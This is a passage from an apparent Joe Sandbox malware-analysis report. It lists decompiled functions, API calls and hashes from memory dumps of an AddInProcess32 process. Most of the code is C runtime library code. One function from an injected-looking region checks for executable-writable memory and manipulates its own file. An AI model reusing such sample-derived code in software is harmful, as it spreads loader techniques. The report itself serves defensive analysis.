Opcode Fuzzy Hash: 3bd3f897773d6a1344295400bfd898daf4910950a1b769de12eb9f80f35f3339
Instruction Fuzzy Hash: 2521F8B29413287BD7219BA4EC89FEB737CEB48760F1401D5FE05EB1C0DA705E858AA0

Uniqueness

Uniqueness Score: -1.00%

Function 00406443 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 77%

			E00406443(intOrPtr _a4) {
				intOrPtr _v0;
				struct HINSTANCE__* _t8;
				_Unknown_base(*)()* _t9;
				intOrPtr _t11;
				void* _t13;
				struct HINSTANCE__* _t15;

				if(TlsGetValue( *0x4138c4) == 0) {
					L4:
					_t15 = GetModuleHandleA("KERNEL32.DLL");
					__eflags = _t15;
					if(__eflags == 0) {
						L9:
						return _a4;
					}
					_t8 = E00406360(__eflags);
					__eflags = _t8;
					if(_t8 == 0) {
						goto L9;
					}
					_t9 = GetProcAddress(_t15, "DecodePointer");
					L7:
					if(_t9 != 0) {
						_v0 =  *_t9(_a4);
					}
					goto L9;
				}
				_t11 =  *0x4138c0; // 0xffffffff
				if(_t11 == 0xffffffff) {
					goto L4;
				}
				_push(_t11);
				_t13 =  *(TlsGetValue( *0x4138c4))();
				if(_t13 == 0) {
					goto L4;
				}
				_t9 =  *(_t13 + 0x1fc);
				goto L7;
			}

0x00406454
0x00406477
0x00406482
0x00406484
0x00406486
0x004064ab
0x004064b0
0x004064b0
0x00406488
0x0040648d
0x0040648f
0x00000000
0x00000000
0x00406497
0x0040649d
0x0040649f
0x004064a7
0x004064a7
0x00000000
0x0040649f
0x00406456
0x0040645e
0x00000000
0x00000000
0x00406460
0x00406469
0x0040646d
0x00000000
0x00000000
0x0040646f
0x00000000

APIs

TlsGetValue.KERNEL32(?,00406ED3,004035FD,?,?,00401E38,00000000,?,?), ref: 00406450
TlsGetValue.KERNEL32(FFFFFFFF,?,00401E38,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00406467
GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,00401E38,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0040647C
GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 00406497

Strings

KERNEL32.DLL, xrefs: 00406477
DecodePointer, xrefs: 00406491

Memory Dump Source

Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd

Similarity

API ID: Value$AddressHandleModuleProc
String ID: DecodePointer$KERNEL32.DLL
API String ID: 1929421221-629428536
Opcode ID: b690ae7a4bf386a7f8bd60c127f260c88c3a5c47ce0539964af77006a0b3269b
Instruction ID: c5ae10eeeadb9dadabf971efa998db1139b8a5cf31b1e54eaa7b2be9f0bd982d
Opcode Fuzzy Hash: b690ae7a4bf386a7f8bd60c127f260c88c3a5c47ce0539964af77006a0b3269b
Instruction Fuzzy Hash: 25F03670900612ABC611EB78ED04DAB3BE4AF017A07168572FC45F72F0DB38DD658AAD

Uniqueness

Uniqueness Score: -1.00%

Function 004063CC Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 77%

			E004063CC(intOrPtr _a4) {
				intOrPtr _v0;
				struct HINSTANCE__* _t8;
				_Unknown_base(*)()* _t9;
				intOrPtr _t11;
				void* _t13;
				struct HINSTANCE__* _t15;

				if(TlsGetValue( *0x4138c4) == 0) {
					L4:
					_t15 = GetModuleHandleA("KERNEL32.DLL");
					__eflags = _t15;
					if(__eflags == 0) {
						L9:
						return _a4;
					}
					_t8 = E00406360(__eflags);
					__eflags = _t8;
					if(_t8 == 0) {
						goto L9;
					}
					_t9 = GetProcAddress(_t15, "EncodePointer");
					L7:
					if(_t9 != 0) {
						_v0 =  *_t9(_a4);
					}
					goto L9;
				}
				_t11 =  *0x4138c0; // 0xffffffff
				if(_t11 == 0xffffffff) {
					goto L4;
				}
				_push(_t11);
				_t13 =  *(TlsGetValue( *0x4138c4))();
				if(_t13 == 0) {
					goto L4;
				}
				_t9 =  *(_t13 + 0x1f8);
				goto L7;
			}

0x004063dd
0x00406400
0x0040640b
0x0040640d
0x0040640f
0x00406434
0x00406439
0x00406439
0x00406411
0x00406416
0x00406418
0x00000000
0x00000000
0x00406420
0x00406426
0x00406428
0x00406430
0x00406430
0x00000000
0x00406428
0x004063df
0x004063e7
0x00000000
0x00000000
0x004063e9
0x004063f2
0x004063f6
0x00000000
0x00000000
0x004063f8
0x00000000

APIs

TlsGetValue.KERNEL32(00000000,00406441,00000000,0040AF2E,00000000,00000000,00000314,?,?,?,00414548,00406E47,00414548,Microsoft Visual C++ Runtime Library,00012010), ref: 004063D9
TlsGetValue.KERNEL32(FFFFFFFF,?,?,?,00414548,00406E47,00414548,Microsoft Visual C++ Runtime Library,00012010), ref: 004063F0
GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,00414548,00406E47,00414548,Microsoft Visual C++ Runtime Library,00012010), ref: 00406405
GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00406420

Strings

KERNEL32.DLL, xrefs: 00406400
EncodePointer, xrefs: 0040641A

Memory Dump Source

Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd

Similarity

API ID: Value$AddressHandleModuleProc
String ID: EncodePointer$KERNEL32.DLL
API String ID: 1929421221-3682587211
Opcode ID: 88cf95aeb8d75637f3377e4c34be696f5c1dcc6d34e432568b273bc1bd6ebf91
Instruction ID: cf491b8ffedcf847512659abc69032a8f38a6fac2648f49244538ea113319bae
Opcode Fuzzy Hash: 88cf95aeb8d75637f3377e4c34be696f5c1dcc6d34e432568b273bc1bd6ebf91
Instruction Fuzzy Hash: D9F0BB30901122ABD7116B6CDD00ADB3BD49F007547168072FC05F32F1DB38CC568AAD

Uniqueness

Uniqueness Score: -1.00%

Function 0040906B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0040906B(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v20;
				signed int _t50;
				intOrPtr _t55;
				int _t56;
				signed short* _t57;
				short* _t58;
				int _t63;
				char* _t69;

				_t69 = _a8;
				if(_t69 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t69 != 0) {
						E004032D9( &_v20, _a16);
						if( *((intOrPtr*)(_v20 + 0x14)) != 0) {
							if(E00409195( *_t69 & 0x000000ff,  &_v20) == 0) {
								_t40 = _v20 + 4; // 0x840ffff8
								_t50 = MultiByteToWideChar( *_t40, 9, _t69, 1, _a4, 0 | _a4 != 0x00000000);
								if(_t50 != 0) {
									L10:
									if(_v8 != 0) {
										 *(_v12 + 0x70) =  *(_v12 + 0x70) & 0xfffffffd;
									}
									return 1;
								}
								L21:
								E00403CE9();
								 *_t50 = 0x2a;
								if(_v8 != 0) {
									_t50 = _v12;
									 *(_t50 + 0x70) =  *(_t50 + 0x70) & 0xfffffffd;
								}
								return _t50 | 0xffffffff;
							}
							_t50 = _v20;
							_t15 = _t50 + 0xac; // 0xa045ff98
							_t63 =  *_t15;
							if(_t63 <= 1 || _a12 < _t63) {
								L17:
								_t24 = _t50 + 0xac; // 0xa045ff98
								if(_a12 <  *_t24 || _t69[1] == 0) {
									goto L21;
								} else {
									goto L19;
								}
							} else {
								_t21 = _t50 + 4; // 0x840ffff8
								_t56 = MultiByteToWideChar( *_t21, 9, _t69, _t63, _a4, 0 | _a4 != 0x00000000);
								_t50 = _v20;
								if(_t56 != 0) {
									L19:
									_t27 = _t50 + 0xac; // 0xa045ff98
									_t55 =  *_t27;
									if(_v8 == 0) {
										return _t55;
									}
									 *(_v12 + 0x70) =  *(_v12 + 0x70) & 0xfffffffd;
									return _t55;
								}
								goto L17;
							}
						}
						_t57 = _a4;
						if(_t57 != 0) {
							 *_t57 =  *_t69 & 0x000000ff;
						}
						goto L10;
					} else {
						_t58 = _a4;
						if(_t58 != 0) {
							 *_t58 = 0;
						}
						goto L5;
					}
				}
			}

0x00409073
0x0040907a
0x0040908f
0x00000000
0x00409081
0x00409083
0x0040909b
0x004090a6
0x004090d8
0x0040916b
0x0040916e
0x00409176
0x004090b6
0x004090b9
0x004090be
0x004090be
0x00000000
0x004090c4
0x00409138
0x00409138
0x0040913d
0x00409146
0x00409148
0x0040914b
0x0040914b
0x00000000
0x0040914f
0x004090da
0x004090dd
0x004090dd
0x004090e6
0x0040910d
0x00409110
0x00409116
0x00000000
0x00000000
0x00000000
0x00000000
0x004090ed
0x004090fd
0x00409100
0x00409108
0x0040910b
0x0040911d
0x00409120
0x00409120
0x00409126
0x00409094
0x00409094
0x0040912f
0x00000000
0x0040912f
0x00000000
0x0040910b
0x004090e6
0x004090a8
0x004090ad
0x004090b3
0x004090b3
0x00000000
0x00409085
0x00409085
0x0040908a
0x0040908c
0x0040908c
0x00000000
0x0040908a
0x00409083

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0040909B
__isleadbyte_l.LIBCMT ref: 004090CF
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,?,?,?,00408678,?,?,00000002), ref: 00409100
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,?,?,?,00408678,?,?,00000002), ref: 0040916E

Strings

pYqt, xrefs: 00409100, 0040916E

Memory Dump Source

Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID: pYqt
API String ID: 3058430110-1213896493
Opcode ID: 3fc5b2d2f1e3e2c4c861b4164b33fcbf6a78946a5b9e7531fab444a04c299768
Instruction ID: 60a8676b7946a16de792e5a19dc617b5d93a58ec6caea168880f03a11062425c
Opcode Fuzzy Hash: 3fc5b2d2f1e3e2c4c861b4164b33fcbf6a78946a5b9e7531fab444a04c299768
Instruction Fuzzy Hash: F231C031B00246EFEB20DFA4C8849AA7BA5AF00311F1485BAE5A4AF2D2D7359D40DB55

Uniqueness

Uniqueness Score: -1.00%

Function 00408DC9 Relevance: 7.7, APIs: 5, Instructions: 188
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E00408DC9(void* __edx, signed int _a4, signed char** _a8) {
				signed int _v8;
				char _v16;
				char _v20;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t39;
				signed short _t42;
				void* _t44;
				void* _t48;
				void* _t52;
				signed short _t55;
				signed int _t59;
				signed int _t69;
				signed int _t75;
				void* _t81;
				void* _t82;
				signed short _t84;
				signed char* _t98;
				signed char* _t107;
				signed char* _t109;
				void* _t117;
				signed char** _t122;
				void* _t123;
				signed int _t124;

				_t117 = __edx;
				_t39 =  *0x413004; // 0x98fc836b
				_v8 = _t39 ^ _t124;
				_t122 = _a8;
				if((_t122[3] & 0x00000040) != 0) {
					L34:
					_t34 =  &(_t122[1]);
					 *_t34 =  &(_t122[1][0xfffffffffffffffe]);
					if( *_t34 < 0) {
						_t42 = E0040BE3B(_t117, _a4 & 0x0000ffff, _t122);
					} else {
						_t42 = _a4;
						 *( *_t122) = _t42;
						 *_t122 =  &(( *_t122)[2]);
					}
					L37:
					_pop(_t123);
					_pop(_t81);
					E0040318A(_t42, _t81, _v8 ^ _t124, _t123);
					return _t42;
				}
				if(E00408D9C(_t122) == 0xffffffff || E00408D9C(_t122) == 0xfffffffe) {
					_t44 = 0x413a18;
				} else {
					_t75 = E00408D9C(_t122);
					_t44 = (E00408D9C(_t122) & 0x0000001f) * 0x38 +  *((intOrPtr*)(0x415ae0 + (_t75 >> 5) * 4));
				}
				_t8 = _t44 + 0x24; // 0x0
				if(( *_t8 & 0x0000007f) == 2) {
					goto L34;
				} else {
					if(E00408D9C(_t122) == 0xffffffff || E00408D9C(_t122) == 0xfffffffe) {
						_t48 = 0x413a18;
					} else {
						_t69 = E00408D9C(_t122);
						_t48 = (E00408D9C(_t122) & 0x0000001f) * 0x38 +  *((intOrPtr*)(0x415ae0 + (_t69 >> 5) * 4));
					}
					_t11 = _t48 + 0x24; // 0x0
					if(( *_t11 & 0x0000007f) != 1) {
						if(E00408D9C(_t122) == 0xffffffff || E00408D9C(_t122) == 0xfffffffe) {
							_t52 = 0x413a18;
						} else {
							_t59 = E00408D9C(_t122);
							_t52 = (E00408D9C(_t122) & 0x0000001f) * 0x38 +  *((intOrPtr*)(0x415ae0 + (_t59 >> 5) * 4));
						}
						if(( *(_t52 + 4) & 0x00000080) == 0) {
							goto L34;
						} else {
							_t55 = E0040C10A( &_v20,  &_v16, 5, _a4);
							if(_t55 != 0) {
								goto L15;
							}
							_t82 = 0;
							if(_v20 <= 0) {
								L33:
								_t42 = _a4;
								goto L37;
							} else {
								goto L28;
							}
							while(1) {
								L28:
								_t26 =  &(_t122[1]);
								 *_t26 = _t122[1] - 1;
								if( *_t26 < 0) {
									_t55 = E00404C86( *((char*)(_t124 + _t82 - 0xc)), _t122);
								} else {
									 *( *_t122) =  *((intOrPtr*)(_t124 + _t82 - 0xc));
									_t98 =  *_t122;
									_t55 =  *_t98 & 0x000000ff;
									 *_t122 =  &(_t98[1]);
								}
								if(_t55 == 0xffffffff) {
									goto L15;
								}
								_t82 = _t82 + 1;
								if(_t82 < _v20) {
									continue;
								}
								goto L33;
							}
							goto L15;
						}
					} else {
						_t12 =  &(_t122[1]);
						 *_t12 = _t122[1] - 1;
						_t84 = _a4;
						if( *_t12 < 0) {
							_t55 = E00404C86(_t84, _t122);
						} else {
							 *( *_t122) = _t84;
							_t109 =  *_t122;
							_t55 =  *_t109 & 0x000000ff;
							 *_t122 =  &(_t109[1]);
						}
						if(_t55 != 0xffffffff) {
							_t15 =  &(_t122[1]);
							 *_t15 = _t122[1] - 1;
							if( *_t15 < 0) {
								_t55 = E00404C86(_t84, _t122);
							} else {
								 *( *_t122) = _t84;
								_t107 =  *_t122;
								_t55 =  *_t107 & 0x000000ff;
								 *_t122 =  &(_t107[1]);
							}
							if(_t55 == 0xffffffff) {
								goto L15;
							} else {
								_t42 = _t84;
								goto L37;
							}
						} else {
							L15:
							_t42 = _t55 | 0x0000ffff;
							goto L37;
						}
					}
				}
			}

0x00408dc9
0x00408dcf
0x00408dd6
0x00408ddb
0x00408de3
0x00408f78
0x00408f78
0x00408f78
0x00408f7c
0x00408f91
0x00408f7e
0x00408f80
0x00408f83
0x00408f86
0x00408f86
0x00408f98
0x00408f9c
0x00408f9f
0x00408fa0
0x00408fa6
0x00408fa6
0x00408df8
0x00408e28
0x00408e06
0x00408e07
0x00408e22
0x00408e25
0x00408e2a
0x00408e31
0x00000000
0x00408e37
0x00408e41
0x00408e71
0x00408e4f
0x00408e50
0x00408e6b
0x00408e6e
0x00408e73
0x00408e7a
0x00408ee2
0x00408f12
0x00408ef0
0x00408ef1
0x00408f0c
0x00408f0f
0x00408f18
0x00000000
0x00408f1a
0x00408f27
0x00408f31
0x00000000
0x00000000
0x00408f37
0x00408f3c
0x00408f72
0x00408f72
0x00000000
0x00000000
0x00000000
0x00000000
0x00408f3e
0x00408f3e
0x00408f3e
0x00408f3e
0x00408f41
0x00408f5c
0x00408f43
0x00408f49
0x00408f4b
0x00408f4d
0x00408f51
0x00408f51
0x00408f66
0x00000000
0x00000000
0x00408f6c
0x00408f70
0x00000000
0x00000000
0x00000000
0x00408f70
0x00000000
0x00408f3e
0x00408e7c
0x00408e7c
0x00408e7c
0x00408e7f
0x00408e82
0x00408e97
0x00408e84
0x00408e86
0x00408e88
0x00408e8a
0x00408e8e
0x00408e8e
0x00408ea1
0x00408eac
0x00408eac
0x00408eaf
0x00408ec4
0x00408eb1
0x00408eb3
0x00408eb5
0x00408eb7
0x00408ebb
0x00408ebb
0x00408ece
0x00000000
0x00408ed0
0x00408ed0
0x00000000
0x00408ed0
0x00408ea3
0x00408ea3
0x00408ea3
0x00000000
0x00408ea3
0x00408ea1
0x00408e7a

APIs

__flsbuf.LIBCMT ref: 00408E97
__flsbuf.LIBCMT ref: 00408EC4
_wctomb_s.LIBCMT ref: 00408F27
__flsbuf.LIBCMT ref: 00408F5C
__flswbuf.LIBCMT ref: 00408F91

Memory Dump Source

Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd

Similarity

API ID: __flsbuf$__flswbuf_wctomb_s
String ID:
API String ID: 3257920507-0
Opcode ID: ca31858a28c25628787a6cd13da6845824825ffbc45749ff7d1aa03c197881a4
Instruction ID: e3320308620aae82afad94c34382f6534f6cf98c8d3c2b43a25689cd414ae7a4
Opcode Fuzzy Hash: ca31858a28c25628787a6cd13da6845824825ffbc45749ff7d1aa03c197881a4
Instruction Fuzzy Hash: 9B5127721196119ECB249B38DA818AB37A8DF16335330073FF5E1EB2D1DE3C9502869D

Uniqueness

Uniqueness Score: -1.00%

Function 02B5138F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E02B5138F(void* __ebx, void* __edi, void* __esi) {
				signed int _v8;
				char _v532;
				short _v1052;
				struct _MEMORY_BASIC_INFORMATION _v1080;
				char _v1084;
				char _v1088;
				signed int _t14;
				void* _t16;
				long _t18;
				long _t21;
				long _t22;
				long _t23;
				signed int _t44;
				signed int _t46;

				_t40 = __edi;
				_t28 = __ebx;
				_t46 = (_t44 & 0xfffffff8) - 0x43c;
				_t14 =  *0x2b56004; // 0xbb40e64e
				_v8 = _t14 ^ _t46;
				_push(__esi);
				_v1088 = 0;
				_t16 = GetModuleHandleA(0);
				if(_t16 == 0 || VirtualQuery(_t16,  &_v1080, 0x1000) == 0) {
					L4:
					_t18 = GetModuleFileNameW(0,  &_v1052, 0x103);
					__eflags = _t18;
					if(_t18 != 0) {
						_t21 = E02B529B2( &_v1052,  &_v1088,  &_v1084);
						__eflags = _t21;
						if(_t21 != 0) {
							_t22 = E02B52D50(_t28, _t40, 0);
							__eflags = _t22;
							if(_t22 != 0) {
								_t23 = E02B52AC6(_t28,  &_v532, 0x2b57468, _t40, 0, 0x1c00);
								_pop(_t34);
								__eflags = _t23;
								if(__eflags != 0) {
									E02B522F0(_t28,  &_v532, _v1088, _t40, 0, __eflags, _v1084, 0);
									_t46 = _t46 + 0xc;
								}
							}
						}
					}
					goto L9;
				} else {
					_t49 = _v1080.Protect - 0x40;
					if(_v1080.Protect != 0x40) {
						goto L4;
					} else {
						E02B52D50(__ebx, __edi, 0);
						E02B51000(__ebx, __edi, 0, _t49);
						L9:
						return E02B53C33(_v8 ^ _t46);
					}
				}
			}

0x02b5138f
0x02b5138f
0x02b51395
0x02b5139b
0x02b513a2
0x02b513a9
0x02b513ad
0x02b513b1
0x02b513b9
0x02b513e3
0x02b513ee
0x02b513f4
0x02b513f6
0x02b51405
0x02b5140b
0x02b5140d
0x02b5140f
0x02b51414
0x02b51416
0x02b51429
0x02b5142e
0x02b5142f
0x02b51431
0x02b51444
0x02b51449
0x02b51449
0x02b51431
0x02b51416
0x02b5140d
0x00000000
0x02b513d0
0x02b513d0
0x02b513d5
0x00000000
0x02b513d7
0x02b513d7
0x02b513dc
0x02b5144c
0x02b5145e
0x02b5145e
0x02b513d5

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 02B513B1
VirtualQuery.KERNEL32(00000000,?,00001000), ref: 02B513C6

Part of subcall function 02B52D50: GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,00000000), ref: 02B52D93
Part of subcall function 02B52D50: CreateFileW.KERNEL32(?,00010000,00000000,00000000,00000003,00000080,00000000,?,00000000), ref: 02B52DAF
Part of subcall function 02B52D50: SetFileInformationByHandle.KERNEL32(00000000,00000003,?,?), ref: 02B52DF1
Part of subcall function 02B52D50: CloseHandle.KERNEL32(00000000), ref: 02B52E04
Part of subcall function 02B52D50: CreateFileW.KERNEL32(?,00010000,00000000,00000000,00000003,00000080,00000000), ref: 02B52E1E
Part of subcall function 02B52D50: SetFileInformationByHandle.KERNEL32(00000000,00000004,?,00000001), ref: 02B52E3E
Part of subcall function 02B52D50: CloseHandle.KERNEL32(00000000), ref: 02B52E47

Part of subcall function 02B51000: GetProcessHeap.KERNEL32(00000008,00200000,?,00000000), ref: 02B51026
Part of subcall function 02B51000: HeapAlloc.KERNEL32(00000000,?,00000000), ref: 02B5102D
Part of subcall function 02B51000: GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,00000000), ref: 02B510E5
Part of subcall function 02B51000: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02B510EC
Part of subcall function 02B51000: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 02B5112C
Part of subcall function 02B51000: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 02B51133

GetModuleFileNameW.KERNEL32(00000000,?,00000103), ref: 02B513EE

Strings

@, xrefs: 02B513D0

Memory Dump Source

Source File: 00000007.00000002.392656395.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B50000, based on PE: true

Associated: 00000007.00000002.392656395.0000000002B56000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.392656395.0000000002B5B000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2b50000_AddInProcess32.jbxd

Similarity

API ID: FileHeap$Handle$ModuleProcess$AllocCloseCreateInformationName$FreeQueryVirtual
String ID: @
API String ID: 1754921816-2766056989
Opcode ID: e3d1c281258557e224337659cea260c4033d2a54745456dba05319395f732670
Instruction ID: d6538d423489bd5b9aedca3d80821de64701dbbe9993fe36e1ef5757e1795148
Opcode Fuzzy Hash: e3d1c281258557e224337659cea260c4033d2a54745456dba05319395f732670
Instruction Fuzzy Hash: 4E1106316143219BD720EB64D851BAB77A8EF44394F084A5DFD889E180EF70D645CBA3

Uniqueness

Uniqueness Score: -1.00%

Function 00401800 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401800(void* __ebx, intOrPtr* __edi, void* __esi) {
				void* _t16;
				void* _t18;
				void* _t19;
				intOrPtr* _t25;
				signed int _t27;
				char _t29;
				void* _t30;

				_t25 = __edi;
				_t19 = __ebx;
				_t29 = 0;
				if(__edi != 0) {
					_t27 = 0;
					if( *__edi > 0) {
						while(1) {
							_t16 = E0040346A( *((intOrPtr*)(_t19 + _t27 * 4)),  *((intOrPtr*)(_t19 + _t27 * 4)), L"/accepteula");
							_t30 = _t30 + 8;
							if(_t16 == 0) {
								break;
							}
							_t18 = E0040346A(_t16,  *((intOrPtr*)(_t19 + _t27 * 4)), L"-accepteula");
							_t30 = _t30 + 8;
							if(_t18 == 0) {
								break;
							} else {
								_t27 = _t27 + 1;
								if(_t27 <  *_t25) {
									continue;
								} else {
								}
							}
							goto L10;
						}
						_t29 = 1;
						while(_t27 <  *_t25 - 1) {
							 *((intOrPtr*)(_t19 + _t27 * 4)) =  *((intOrPtr*)(_t19 + 4 + _t27 * 4));
							_t27 = _t27 + 1;
						}
						 *_t25 =  *_t25 + 0xffffffff;
					}
					L10:
				}
				if(E00401470(_t29) != 0) {
					_t29 = 1;
				}
				return 0 | _t29 != 0x00000000;
			}

0x00401800
0x00401800
0x00401801
0x00401805
0x00401808
0x0040180c
0x00401810
0x00401819
0x0040181e
0x00401823
0x00000000
0x00000000
0x0040182e
0x00401833
0x00401838
0x00000000
0x0040183a
0x0040183a
0x0040183f
0x00000000
0x00000000
0x00401841
0x0040183f
0x00000000
0x00401838
0x00401845
0x0040184e
0x00401854
0x00401859
0x0040185d
0x00401861
0x00401861
0x00401864
0x00401864
0x00401870
0x00401872
0x00401872
0x0040187f

APIs

__wcsicmp.LIBCMT ref: 00401819
__wcsicmp.LIBCMT ref: 0040182E

Strings

/accepteula, xrefs: 00401813
-accepteula, xrefs: 00401828

Memory Dump Source

Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd

Similarity

API ID: __wcsicmp
String ID: -accepteula$/accepteula
API String ID: 1389419275-3604086781
Opcode ID: ba85f18d7fde8d1ccc12eb71a396890943377c3b439308736d5df5222ea4d1bc
Instruction ID: ae80dfe79650e11862fde2afe1a2a16d5d6f03895628a9dbedd2dac65a09cae5
Opcode Fuzzy Hash: ba85f18d7fde8d1ccc12eb71a396890943377c3b439308736d5df5222ea4d1bc
Instruction Fuzzy Hash: F1012473D0022A87CB307EBA9C41B6B77486B50348F11863AAC59B73D2EA79DE50C695

Uniqueness

Uniqueness Score: -1.00%

Function 004065E8 Relevance: 6.0, APIs: 4, Instructions: 45
threadCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 70%

			E004065E8(void* __ebx, void* __edx) {
				void* __edi;
				void* __esi;
				long _t3;
				void* _t9;
				long _t12;
				void* _t20;
				long _t21;
				long* _t22;

				_t20 = __edx;
				_t3 = GetLastError();
				_push( *0x4138c0);
				_t21 = _t3;
				_t22 =  *((intOrPtr*)(E004064BA()))();
				if(_t22 == 0) {
					_t22 = E00407C87(1, 0x214);
					if(_t22 != 0) {
						_push(_t22);
						_push( *0x4138c0);
						_t9 =  *((intOrPtr*)(E00406443( *0x4144f8)))();
						_t25 = _t9;
						if(_t9 == 0) {
							_push(_t22);
							E00403199(_t20, _t22, __eflags);
							_t22 = 0;
							__eflags = 0;
						} else {
							_push(0);
							_push(_t22);
							E00406529(__ebx, _t21, _t22, _t25);
							_t12 = GetCurrentThreadId();
							_t22[1] = _t22[1] | 0xffffffff;
							 *_t22 = _t12;
						}
					}
				}
				SetLastError(_t21);
				return _t22;
			}

0x004065e8
0x004065ea
0x004065f0
0x004065f6
0x004065ff
0x00406603
0x00406611
0x00406617
0x00406619
0x0040661a
0x0040662c
0x0040662e
0x00406630
0x0040664a
0x0040664b
0x00406651
0x00406651
0x00406632
0x00406632
0x00406634
0x00406635
0x0040663c
0x00406642
0x00406646
0x00406646
0x00406630
0x00406617
0x00406654
0x0040665e

APIs

GetLastError.KERNEL32(00000000,?,00406665,?,004085BE,00000000,00000000,00000000), ref: 004065EA

Part of subcall function 004064BA: TlsGetValue.KERNEL32(?,004065FD), ref: 004064C1
Part of subcall function 004064BA: TlsSetValue.KERNEL32(00000000), ref: 004064E2

__calloc_crt.LIBCMT ref: 0040660C

Part of subcall function 00407C87: __calloc_impl.LIBCMT ref: 00407C95
Part of subcall function 00407C87: Sleep.KERNEL32(00000000,00406611,00000001,00000214), ref: 00407CAC

Part of subcall function 00406443: TlsGetValue.KERNEL32(?,00406ED3,004035FD,?,?,00401E38,00000000,?,?), ref: 00406450
Part of subcall function 00406443: TlsGetValue.KERNEL32(FFFFFFFF,?,00401E38,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00406467

Part of subcall function 00406529: GetModuleHandleA.KERNEL32(KERNEL32.DLL,00411A98,0000000C,0040663A,00000000,00000000), ref: 0040653A
Part of subcall function 00406529: GetProcAddress.KERNEL32(?,EncodePointer), ref: 0040656E
Part of subcall function 00406529: GetProcAddress.KERNEL32(?,DecodePointer), ref: 0040657E
Part of subcall function 00406529: InterlockedIncrement.KERNEL32(004132A8), ref: 004065A0
Part of subcall function 00406529: ___addlocaleref.LIBCMT ref: 004065C7

GetCurrentThreadId.KERNEL32 ref: 0040663C
SetLastError.KERNEL32(00000000), ref: 00406654

Memory Dump Source

Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd

Similarity

API ID: Value$AddressErrorLastProc$CurrentHandleIncrementInterlockedModuleSleepThread___addlocaleref__calloc_crt__calloc_impl
String ID:
API String ID: 4195734883-0
Opcode ID: 0a1dba65162e7cf836f553f42e2d84d0de64361cde726b6ef0bf73927a476e36
Instruction ID: 6acc180e9db3e0c08f8946cbde5c9b75496807f8aa197502050a49a5b2d53bc3
Opcode Fuzzy Hash: 0a1dba65162e7cf836f553f42e2d84d0de64361cde726b6ef0bf73927a476e36
Instruction Fuzzy Hash: 13F04C324002226BD2313BB5BC0668A3B95DF01BB9B12453FF542BA2D0DF3DC91182DD

Uniqueness

Uniqueness Score: -1.00%

Function 00401C30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 26%

			E00401C30(signed int __ecx, void* __edx) {
